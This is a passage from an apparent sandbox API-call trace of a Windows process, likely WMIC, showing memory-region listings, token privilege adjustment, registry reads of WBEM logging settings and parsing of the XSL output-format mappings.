"c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 22981 start_va = 0x71f00000 end_va = 0x71f0cfff entry_point = 0x71f00000 region_type = mapped_file name = "msoxmlmf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmlmf.dll") Region: id = 22982 start_va = 0x2490000 end_va = 0x249ffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 23042 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 23417 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 23418 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 23569 start_va = 0x6e0000 end_va = 0x703fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 24782 start_va = 0x6e0000 end_va = 0x6e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Thread: id = 334 os_tid = 0xf7c [0160.222] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcff14 | out: lpSystemTimeAsFileTime=0xcff14*(dwLowDateTime=0x9949eae0, dwHighDateTime=0x1d440a9)) [0160.222] GetCurrentProcessId () returned 0xf38 [0160.222] GetCurrentThreadId () returned 0xf7c [0160.222] GetTickCount () returned 0x30dd5 [0160.222] QueryPerformanceCounter (in: lpPerformanceCount=0xcff0c | out: lpPerformanceCount=0xcff0c*=21701169701) returned 1 [0160.223] GetModuleHandleA (lpModuleName=0x0) returned 0x870000 [0160.223] __set_app_type (_Type=0x1) [0160.223] __p__fmode () returned 0x76b331f4 [0160.223] __p__commode () returned 0x76b331fc [0160.223] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8adc15) returned 0x0 [0160.224] __wgetmainargs (in: _Argc=0x8bc5e8, _Argv=0x8bc5f0, _Env=0x8bc5ec, _DoWildCard=0, _StartInfo=0x8bc5fc | out: _Argc=0x8bc5e8, _Argv=0x8bc5f0, _Env=0x8bc5ec) returned 0 [0160.414] ??0CHString@@QAE@XZ () returned 0x8bc28c [0160.420] ??0CHString@@QAE@XZ () returned 0x8bc594 [0160.420] ?Empty@CHString@@QAEXXZ () returned 0x6f950504 [0160.420] SetConsoleCtrlHandler (HandlerRoutine=0x8a6b6f, Add=1) returned 1 [0160.420] _onexit (_Func=0x8b2f1f) returned 0x8b2f1f [0160.421] _onexit (_Func=0x8b2f2e) returned 0x8b2f2e [0160.421] _onexit (_Func=0x8b2f42) returned 0x8b2f42 [0160.421] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.421] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0160.426] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0160.431] CoCreateInstance (in: rclsid=0x876c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x876b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8bc1b0 | out: ppv=0x8bc1b0*=0x720828) returned 0x0 [0160.741] GetCurrentProcess () returned 0xffffffff [0160.744] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xcfdbc | out: TokenHandle=0xcfdbc*=0xf0) returned 1 [0160.744] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcfdb8 | out: TokenInformation=0x0, ReturnLength=0xcfdb8) returned 0 [0160.744] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x3, TokenInformation=0x473b30, TokenInformationLength=0x118, ReturnLength=0xcfdb8 | out: TokenInformation=0x473b30, ReturnLength=0xcfdb8) returned 1 [0160.744] AdjustTokenPrivileges (in: TokenHandle=0xf0, DisableAllPrivileges=0, NewState=0x473b30*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0160.745] CloseHandle (hObject=0xf0) returned 1 [0160.745] GetSystemDirectoryW (in: lpBuffer=0x473c08, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0160.759] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0160.759] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0160.759] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76910000 [0160.759] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0160.759] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.760] FreeLibrary (hLibModule=0x76910000) returned 1 [0160.760] _vsnwprintf (in: _Buffer=0x473bc0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xcfd18 | out: _Buffer="ms_409") returned 6 [0160.760] GetComputerNameW (in: lpBuffer=0x473c08, nSize=0xcfd70 | out: lpBuffer="CRH2YWU7", nSize=0xcfd70) returned 1 [0160.760] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.760] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.760] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xcfdac | out: lpNameBuffer=0x0, nSize=0xcfdac) returned 0x0 [0160.761] GetLastError () returned 0xea [0160.761] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x473c50, nSize=0xcfdac | out: lpNameBuffer="CRH2YWU7\\EEBsYm5", nSize=0xcfdac) returned 0x1 [0160.761] lstrlenW (lpString="") returned 0 [0160.761] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.761] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="", cchCount2=0) returned 3 [0160.763] lstrlenW (lpString=".") returned 1 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2=".", cchCount2=1) returned 3 [0160.763] lstrlenW (lpString="LOCALHOST") returned 9 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="LOCALHOST", cchCount2=9) returned 1 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="CRH2YWU7", cchCount2=8) returned 2 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] SysStringLen (param_1="IDENTIFY") returned 0x8 [0160.763] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.763] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.763] SysStringLen (param_1="IDENTIFY") returned 0x8 [0160.764] SysStringLen (param_1="IMPERSONATE") returned 0xb [0160.764] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.764] SysStringLen (param_1="IMPERSONATE") returned 0xb [0160.764] SysStringLen (param_1="IDENTIFY") returned 0x8 [0160.764] SysStringLen (param_1="IDENTIFY") returned 0x8 [0160.764] SysStringLen (param_1="IMPERSONATE") returned 0xb [0160.764] SysStringLen (param_1="DELEGATE") returned 0x8 [0160.764] SysStringLen (param_1="IDENTIFY") returned 0x8 [0160.764] SysStringLen (param_1="DELEGATE") returned 0x8 [0160.764] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.764] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.764] SysStringLen (param_1="DELEGATE") returned 0x8 [0160.764] SysStringLen (param_1="NONE") returned 0x4 [0160.764] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.764] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.764] SysStringLen (param_1="NONE") returned 0x4 [0160.765] SysStringLen (param_1="CONNECT") returned 0x7 [0160.765] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.765] SysStringLen (param_1="CALL") returned 0x4 [0160.765] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.765] SysStringLen (param_1="CALL") returned 0x4 [0160.765] SysStringLen (param_1="CONNECT") returned 0x7 [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="NONE") returned 0x4 [0160.766] SysStringLen (param_1="NONE") returned 0x4 [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="NONE") returned 0x4 [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0160.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.766] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0160.767] GetSystemDirectoryW (in: lpBuffer=0x472c98, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0160.767] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0160.767] SysStringLen (param_1="\\wbem\\") returned 0x6 [0160.767] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0160.767] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0160.767] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0160.767] GetCurrentThreadId () returned 0xf7c [0160.768] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xcf8c8 | out: phkResult=0xcf8c8*=0xf4) returned 0x0 [0160.768] RegQueryValueExW (in: hKey=0xf4, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xcf8d4, lpcbData=0xcf8d0*=0x400 | out: lpType=0x0, lpData=0xcf8d4*=0x30, lpcbData=0xcf8d0*=0x4) returned 0x0 [0160.768] _wcsicmp (_String1="0", _String2="1") returned -1 [0160.768] _wcsicmp (_String1="0", _String2="2") returned -2 [0160.768] RegQueryValueExW (in: hKey=0xf4, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xcf8d0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xcf8d0*=0x42) returned 0x0 [0160.768] RegQueryValueExW (in: hKey=0xf4, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x472ce0, lpcbData=0xcf8d0*=0x42 | out: lpType=0x0, lpData=0x472ce0*=0x25, lpcbData=0xcf8d0*=0x42) returned 0x0 [0160.768] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0160.768] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0160.768] RegQueryValueExW (in: hKey=0xf4, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xcf8d4, lpcbData=0xcf8d0*=0x400 | out: lpType=0x0, lpData=0xcf8d4*=0x36, lpcbData=0xcf8d0*=0xc) returned 0x0 [0160.768] _wtol (_String="65536") returned 65536 [0160.768] RegCloseKey (hKey=0x0) returned 0x6 [0160.768] CoCreateInstance (in: rclsid=0x876d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x876d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xcfd64 | out: ppv=0xcfd64*=0x674630) returned 0x0 [0163.281] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x674630, xmlSource=0xcfce8*(varType=0x8, wReserved1=0xffff, wReserved2=0x6570, wReserved3=0x7728, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xcfd4c | out: isSuccessful=0xcfd4c*=0xffff) returned 0x0 [0169.419] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x674630, DOMElement=0xcfd60 | out: DOMElement=0xcfd60*=0x678c58) returned 0x0 [0169.429] IXMLDOMElement:getElementsByTagName (in: This=0x678c58, tagName="XSLFORMAT", resultList=0xcfd5c | out: resultList=0xcfd5c*=0x678e80) returned 0x0 [0169.430] IXMLDOMNodeList:get_length (in: This=0x678e80, listLength=0xcfd44 | out: listLength=0xcfd44*=21) returned 0x0 [0169.430] IXMLDOMNodeList:get_item (in: This=0x678e80, index=0, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.431] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.431] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.431] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.432] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0169.432] IUnknown:Release (This=0x674b20) returned 0x0 [0169.432] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.432] IUnknown:Release (This=0x678c98) returned 0x0 [0169.432] IXMLDOMNodeList:get_item (in: This=0x678e80, index=1, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.433] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="textvaluelist.xsl") returned 0x0 [0169.433] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.433] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.433] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0169.433] SysStringLen (param_1="VALUE") returned 0x5 [0169.433] SysStringLen (param_1="TABLE") returned 0x5 [0169.434] SysStringLen (param_1="TABLE") returned 0x5 [0169.434] SysStringLen (param_1="VALUE") returned 0x5 [0169.434] IUnknown:Release (This=0x674b20) returned 0x0 [0169.434] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.434] IUnknown:Release (This=0x678c98) returned 0x0 [0169.434] IXMLDOMNodeList:get_item (in: This=0x678e80, index=2, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.434] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="textvaluelist.xsl") returned 0x0 [0169.434] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.435] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.435] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="LIST", varVal2=0x0)) returned 0x0 [0169.435] SysStringLen (param_1="LIST") returned 0x4 [0169.435] SysStringLen (param_1="TABLE") returned 0x5 [0169.436] IUnknown:Release (This=0x674b20) returned 0x0 [0169.436] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.436] IUnknown:Release (This=0x678c98) returned 0x0 [0169.436] IXMLDOMNodeList:get_item (in: This=0x678e80, index=3, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.436] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="rawxml.xsl") returned 0x0 [0169.436] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.436] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.436] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0169.437] SysStringLen (param_1="RAWXML") returned 0x6 [0169.437] SysStringLen (param_1="TABLE") returned 0x5 [0169.437] SysStringLen (param_1="RAWXML") returned 0x6 [0169.437] SysStringLen (param_1="LIST") returned 0x4 [0169.437] SysStringLen (param_1="LIST") returned 0x4 [0169.437] SysStringLen (param_1="RAWXML") returned 0x6 [0169.437] IUnknown:Release (This=0x674b20) returned 0x0 [0169.437] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.437] IUnknown:Release (This=0x678c98) returned 0x0 [0169.437] IXMLDOMNodeList:get_item (in: This=0x678e80, index=4, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.437] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="htable.xsl") returned 0x0 [0169.437] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.438] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.438] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0169.438] SysStringLen (param_1="HTABLE") returned 0x6 [0169.438] SysStringLen (param_1="TABLE") returned 0x5 [0169.438] SysStringLen (param_1="HTABLE") returned 0x6 [0169.438] SysStringLen (param_1="LIST") returned 0x4 [0169.438] IUnknown:Release (This=0x674b20) returned 0x0 [0169.438] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.439] IUnknown:Release (This=0x678c98) returned 0x0 [0169.439] IXMLDOMNodeList:get_item (in: This=0x678e80, index=5, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.439] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="hform.xsl") returned 0x0 [0169.439] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.439] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.439] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0169.439] SysStringLen (param_1="HFORM") returned 0x5 [0169.440] SysStringLen (param_1="TABLE") returned 0x5 [0169.440] SysStringLen (param_1="HFORM") returned 0x5 [0169.440] SysStringLen (param_1="LIST") returned 0x4 [0169.440] SysStringLen (param_1="HFORM") returned 0x5 [0169.440] SysStringLen (param_1="HTABLE") returned 0x6 [0169.440] IUnknown:Release (This=0x674b20) returned 0x0 [0169.440] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.440] IUnknown:Release (This=0x678c98) returned 0x0 [0169.440] IXMLDOMNodeList:get_item (in: This=0x678e80, index=6, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.440] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="xml.xsl") returned 0x0 [0169.440] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.440] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.441] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="XML", varVal2=0x0)) returned 0x0 [0169.441] SysStringLen (param_1="XML") returned 0x3 [0169.441] SysStringLen (param_1="TABLE") returned 0x5 [0169.442] SysStringLen (param_1="XML") returned 0x3 [0169.442] SysStringLen (param_1="VALUE") returned 0x5 [0169.442] SysStringLen (param_1="VALUE") returned 0x5 [0169.442] SysStringLen (param_1="XML") returned 0x3 [0169.442] IUnknown:Release (This=0x674b20) returned 0x0 [0169.442] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.442] IUnknown:Release (This=0x678c98) returned 0x0 [0169.442] IXMLDOMNodeList:get_item (in: This=0x678e80, index=7, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.442] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="mof.xsl") returned 0x0 [0169.442] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.442] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.443] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="MOF", varVal2=0x0)) returned 0x0 [0169.443] SysStringLen (param_1="MOF") returned 0x3 [0169.443] SysStringLen (param_1="TABLE") returned 0x5 [0169.443] SysStringLen (param_1="MOF") returned 0x3 [0169.443] SysStringLen (param_1="LIST") returned 0x4 [0169.443] SysStringLen (param_1="MOF") returned 0x3 [0169.443] SysStringLen (param_1="RAWXML") returned 0x6 [0169.443] SysStringLen (param_1="LIST") returned 0x4 [0169.443] SysStringLen (param_1="MOF") returned 0x3 [0169.444] IUnknown:Release (This=0x674b20) returned 0x0 [0169.444] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.444] IUnknown:Release (This=0x678c98) returned 0x0 [0169.444] IXMLDOMNodeList:get_item (in: This=0x678e80, index=8, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.444] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="csv.xsl") returned 0x0 [0169.444] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.444] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.444] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="CSV", varVal2=0x0)) returned 0x0 [0169.444] SysStringLen (param_1="CSV") returned 0x3 [0169.444] SysStringLen (param_1="TABLE") returned 0x5 [0169.445] SysStringLen (param_1="CSV") returned 0x3 [0169.445] SysStringLen (param_1="LIST") returned 0x4 [0169.445] SysStringLen (param_1="CSV") returned 0x3 [0169.445] SysStringLen (param_1="HTABLE") returned 0x6 [0169.445] SysStringLen (param_1="CSV") returned 0x3 [0169.445] SysStringLen (param_1="HFORM") returned 0x5 [0169.445] IUnknown:Release (This=0x674b20) returned 0x0 [0169.445] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.445] IUnknown:Release (This=0x678c98) returned 0x0 [0169.445] IXMLDOMNodeList:get_item (in: This=0x678e80, index=9, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.445] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.445] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.445] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.446] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0169.446] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.446] SysStringLen (param_1="TABLE") returned 0x5 [0169.446] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.446] SysStringLen (param_1="VALUE") returned 0x5 [0169.446] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.446] SysStringLen (param_1="XML") returned 0x3 [0169.446] SysStringLen (param_1="XML") returned 0x3 [0169.446] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.446] IUnknown:Release (This=0x674b20) returned 0x0 [0169.446] IUnknown:Release 